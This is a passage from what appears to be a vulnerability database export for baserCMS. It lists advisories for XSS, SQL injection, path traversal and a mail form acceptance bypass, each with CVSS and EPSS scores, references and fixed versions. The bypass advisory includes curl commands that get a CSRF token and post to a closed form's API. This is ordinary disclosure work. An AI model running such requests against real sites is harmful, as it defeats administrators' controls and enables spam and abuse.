- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>
- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>
- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>

This advisory was translated from Japanese to English using GitHub Copilot.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
reference_id
reference_type
scores
0
value 0.00145
scoring_system epss
scoring_elements 0.34571
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
6
reference_url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
reference_id GHSA-c5c6-37vq-pjcq
reference_type
scores
url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30940, GHSA-c5c6-37vq-pjcq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge
4
url VCID-8ssu-umet-37bk
vulnerability_id VCID-8ssu-umet-37bk
summary
baserCMS is Vulnerable to Cross-site Scripting
baserCMS has DOM-based cross-site scripting in tag creation.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability
Malicious JavaScript may be executed when creating a tag.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information:
https://basercms.net/security/JVN_94952030

### Credits

- quanlna2 (Le Nguyen Anh Quan)
- namdi (Do Ich Nam)
- minhnn42 (Nguyen Ngoc Minh)
- VCSLab - Viettel Cyber Security
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
6
reference_url https://github.com/advisories/GHSA-677c-xv24-crgx
reference_id GHSA-677c-xv24-crgx
reference_type
scores
url https://github.com/advisories/GHSA-677c-xv24-crgx
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-32734, GHSA-677c-xv24-crgx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk
5
url VCID-d1sf-cmct-zbh1
vulnerability_id VCID-d1sf-cmct-zbh1
summary
baserCMS has Mail Form Acceptance Bypass via Public API
### Summary
A public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.

### Details
In baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).

These checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()`  
(e.g. `plugins/bc-mail/src/Controller/MailController.php`).

However, the public API endpoint:

`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`

does not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.

The endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.

### PoC
1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).
2. Obtain a CSRF cookie by accessing the site root:
```
curl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'
```
3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:
```
curl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Referer: http://localhost/' \
  -H 'X-CSRF-Token: <csrf-token-from-cookie>' \
  -b /tmp/basercms_cookies.txt \
  --data-urlencode 'name_1=Test' \
  --data-urlencode 'name_2=User' \
  --data-urlencode 'email_1=test@example.com' \
  --data-urlencode 'email_2=test@example.com' \
  --data-urlencode 'category[]=資料請求' \
  --data-urlencode 'root=検索エンジン' \
  --data-urlencode 'message=API bypass test'
```
4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.

### Impact
This is an access control / business logic bypass vulnerability.

Administrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
reference_id
reference_type
scores
0
value 0.0002
scoring_system epss
scoring_elements 0.05615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
6
reference_url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
reference_id GHSA-8cr7-r8qw-gp3c
reference_type
scores
url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30878, GHSA-8cr7-r8qw-gp3c
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1
6
url VCID-ggv8-3v9t-mfea
vulnerability_id VCID-ggv8-3v9t-mfea
summary
baserCMS Cross-site Scripting vulnerability in Site search Feature
There is an XSS vulnerability in the site search feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
reference_id
reference_type
scores
0
value 0.00622
scoring_system epss
scoring_elements 0.70549
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
reference_id CVE-2023-44379
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
5
reference_url https://github.com/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-66c2-p8rh-qx87
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-44379, GHSA-66c2-p8rh-qx87
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ggv8-3v9t-mfea
7
url VCID-k5qv-4yp3-zbgf
vulnerability_id VCID-k5qv-4yp3-zbgf
summary
baserCMS has an SQL injection vulnerability in its blog post functionality
baserCMS has a SQL injection vulnerability in blog posts.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

Malicious SQL may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_52157568

### Credits

Mirai Matsumoto@Future Secure Wave, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02096
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
6
reference_url https://github.com/advisories/GHSA-vh89-rjph-2g7p
reference_id GHSA-vh89-rjph-2g7p
reference_type
scores
url https://github.com/advisories/GHSA-vh89-rjph-2g7p
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-27697, GHSA-vh89-rjph-2g7p
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf
8
url VCID-khft-xvrw-g3dr
vulnerability_id VCID-khft-xvrw-g3dr
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request
XSS vulnerability in the HTTP 400 Bad Request response of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
reference_id
reference_type
scores
0
value 0.0087
scoring_system epss
scoring_elements 0.75582
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_06274755
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://basercms.net/security/JVN_06274755
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
reference_id CVE-2024-46995
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
5
reference_url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46995, GHSA-mr7q-fv7j-jcgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr
9
url VCID-mfm9-gsh3-ubg8
vulnerability_id VCID-mfm9-gsh3-ubg8
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature
XSS vulnerability in the blog posts feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
reference_id
reference_type
scores
0
value 0.01236
scoring_system epss
scoring_elements 0.79576
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
reference_id CVE-2024-46996
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
4
reference_url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46996, GHSA-66jv-qrm3-vvfg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8
10
url VCID-nxrf-64er-xbfx
vulnerability_id VCID-nxrf-64er-xbfx
summary
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
reference_id
reference_type
scores
0
value 0.02281
scoring_system epss
scoring_elements 0.85006
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
reference_id CVE-2024-26128
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
